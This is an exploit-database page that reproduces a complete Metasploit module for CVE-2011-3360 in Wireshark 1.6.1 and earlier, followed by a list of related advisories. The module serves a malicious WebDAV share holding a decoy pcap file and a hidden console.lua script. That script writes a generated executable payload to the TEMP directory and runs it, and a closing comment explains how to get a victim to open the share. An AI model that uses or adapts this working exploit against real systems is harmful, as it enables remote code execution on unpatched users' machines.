Lucene search
Metasploit1337DAY-ID-16860HistoryNov 18, 2011 - 12:00 a.m.
Wireshark console.lua pre-loading vulnerability
2011-11-1800:00:00
metasploit
0day.today
10
Exploit for windows platform in category remote exploits
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Wireshark console.lua pre-loading vulnerability",
'Description' => %q{
This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a
pcap file, Wireshark will actually check if there's a 'console.lua' file in the same
directory, and then parse/execute the script if found. Versions affected by this
vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r', #Metasploit
],
'References' =>
[
['CVE', '2011-3360'],
['OSVDB', '75347'],
['URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136'],
['URL', 'http://technet.microsoft.com/en-us/security/advisory/2269637']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'win',
'Targets' =>
[
['Wireshark 1.6.1 or less', {}],
],
'Privileged' => false,
'DisclosureDate' => "Jul 18 2011", #Didn't go public until 2011-09-21 though
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
OptString.new('SHARENAME', [ true, "The name of the top-level share.", "files"]),
OptString.new('URIPATH', [ true, "The URI to use", "/" ]),
OptString.new('FILENAME', [ true, "The name of the pcap file", "msf.pcap"])
], self.class)
deregister_options('SSL', 'SSLVersion') # WebDAV does not support SSL
end
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
when 'PROPFIND'
process_propfind(cli, request)
when 'GET'
process_get(cli, request)
else
print_status("#{cli.peerhost}:#{cli.peerport} #{request.method} => 404 (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
end
def process_get(cli, request)
print_status("URI requested: #{request.uri.to_s}")
if request.uri =~ /\.lua$/
# Load lua script
print_status("Sending lua script")
send_response(cli, @p, {'Content-Type'=>'application/octet-stream'})
elsif request.uri =~ /#{datastore['FILENAME']}/
# Load an empty pcap file
# Format reference: http://wiki.wireshark.org/Development/LibpcapFileFormat
pcap = ''
pcap << "\xd4\xc3\xb2\xa1" #Magic number
pcap << "\x02\x00" #Major version number
pcap << "\x04\x00" #Minor version number
pcap << "\x00\x00\x00\x00" #GMT to local correction
pcap << "\x00\x00\x00\x00" #Accuracy of timestamp
pcap << "\xff\xff\x00\x00" #Maxlength of captured packets in octets
pcap << "\x01\x00\x00\x00" #Data length type
print_status("Sending fake pcap file")
send_response(cli, pcap, {'Content-Type'=>'application/octet-stream'})
else
# Don't know the request, return not found
print_error("Don't care about this file, 404")
send_not_found(cli)
end
return
end
def process_options(cli, request)
vprint_status("#{cli.peerhost}:#{cli.peerport} OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ''
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
def process_propfind(cli, request)
path = request.uri
vprint_status("Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}")
body = ''
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
my_uri = "http://#{my_host}/"
if path !~ /\/$/
if path.index(".")
print_status("Sending 404 for #{path} ...")
resp = create_response(404, "Not Found")
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
return
else
print_status("Sending 301 for #{path} ...")
resp = create_response(301, "Moved")
resp["Location"] = path + "/"
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
return
end
end
print_status("Sending directory multistatus for #{path} ...")
body = <<-BODY
<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>
<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
BODY
body = body.gsub(/^\t\t/, '')
if request["Depth"].to_i > 0
if path.scan("/").length < 2
body << generate_shares(path)
else
#Set filenames, and set the hidden attribute
filenames =
[
['console.lua', true],
[datastore['FILENAME'], false]
]
body << generate_files(path, filenames)
end
end
body << "</D:multistatus>"
body.gsub!(/\t/, '')
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml; charset="utf8"'
cli.send_response(resp)
end
def gen_timestamp(ttype=nil)
::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
end
def gen_datestamp(ttype=nil)
::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
end
def generate_shares(path)
share_name = datastore['SHARENAME']
share = <<-SHARE
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
SHARE
share = share.gsub(/^\t\t/, '')
return share
end
def generate_files(path, items)
trail = path.split("/")
return "" if trail.length < 2
files = ""
items.each do |f, hide|
h = hide ? '1' : '0'
files << <<-FILES
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{f}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
<D:ishidden b:dt="boolean">#{h}</D:ishidden>
</D:propstat>
</D:response>
FILES
end
files = files.gsub(/^\t\t\t/, '')
return files
end
def get_lua_payload
# Generate our executable payload, and then convert every byte
# in decimal format
p = generate_payload_exe
buf = ''
p.each_byte do |b|
buf << "\\#{b.to_s}"
end
# Create the lua script that contains our payload
var_payload_name = rand_text_alpha(5)
var_temp_name = rand_text_alpha(5)
lua_script = <<-LUA
#{var_payload_name} = "#{buf}"
#{var_temp_name} = os.getenv("TEMP") .. os.tmpname() .. ".exe"
local f = io.open(#{var_temp_name}, "wb")
f:write(#{var_payload_name})
f:close()
os.execute(#{var_temp_name})
LUA
lua_script = lua_script.gsub(/^\t\t/, '')
return lua_script
end
def exploit
@p = get_lua_payload
super
end
end
=begin
Example of how to open the share:
My Computer -> Tools -> Map Network Driver -> Sign up for online storage or
connect to a network server -> Choose another network location ->
enter the network address
On an unpatched XP SP3 (and other Windows systems), the ideal URI format is like this:
http://192.168.1.11/
But on a fully patched XP SP3, the same URI format will not work. Windows will try to list
the share via SMB, and the victim will not see the share. In this case, you should specify
the URI to like this:
http://192.168.1.11/files
=end
# 0day.today [2018-04-01] #Related
openvas
openvas
Wireshark Lua Script File Arbitrary Code Execution Vulnerability (Windows)
2011-10-04 00:00:00
Wireshark Lua Script File Arbitrary Code Execution Vulnerability - Windows
2011-10-04 00:00:00
Debian Security Advisory DSA 2324-1 (wireshark)
2012-02-11 00:00:00
ubuntucve
ubuntucve
CVE-2011-3360
2011-09-20 00:00:00
metasploit
metasploit
Wireshark console.lua Pre-Loading Script Execution
2011-11-19 03:24:48
cvelist
cvelist
CVE-2011-3360
2011-09-20 10:00:00
msvr
msvr
Vulnerability in Wireshark Allows For Arbitrary Script Execution
2011-11-15 00:00:00
checkpoint_advisories
checkpoint_advisories
Wireshark Insecure Search Path Script Execution (CVE-2011-3360)
2012-03-26 00:00:00
nessus
nessus
Debian DSA-2324-1 : wireshark - programming error
2011-10-21 00:00:00
Wireshark 1.4.x < 1.4.9 Multiple Vulnerabilities
2011-09-12 00:00:00
d2
d2
DSquare Exploit Pack: D2SEC_WIRESHARK
2011-09-20 10:55:00
debiancve
debiancve
CVE-2011-3360
2011-09-20 10:55:04
nvd
nvd
CVE-2011-3360
2011-09-20 10:55:04
exploitdb
exploitdb
Wireshark - console.lua pre-loading (Metasploit)
2011-11-19 00:00:00
saint
saint
Wireshark Lua Untrusted Search Path vulnerability
2011-11-25 00:00:00
Wireshark Lua Untrusted Search Path vulnerability
2011-11-25 00:00:00
Wireshark Lua Untrusted Search Path vulnerability
2011-11-25 00:00:00
prion
prion
Design/Logic Flaw
2011-09-20 10:55:00
packetstorm
packetstorm
Wireshark 1.6 console.lua Pre-Load / Execution
2011-11-20 00:00:00
debian
debian
[SECURITY] [DSA 2324-1] wireshark security update
2011-10-20 19:45:59
cve
cve
CVE-2011-3360
2011-09-20 10:55:04
securityvulns
securityvulns
[ MDVSA-2011:138 ] wireshark
2011-10-01 00:00:00
Wireshark multiple security vulnerabilities
2011-10-01 00:00:00
gentoo
gentoo
Wireshark: Multiple vulnerabilities
2011-10-09 00:00:00
Related for 1337DAY-ID-16860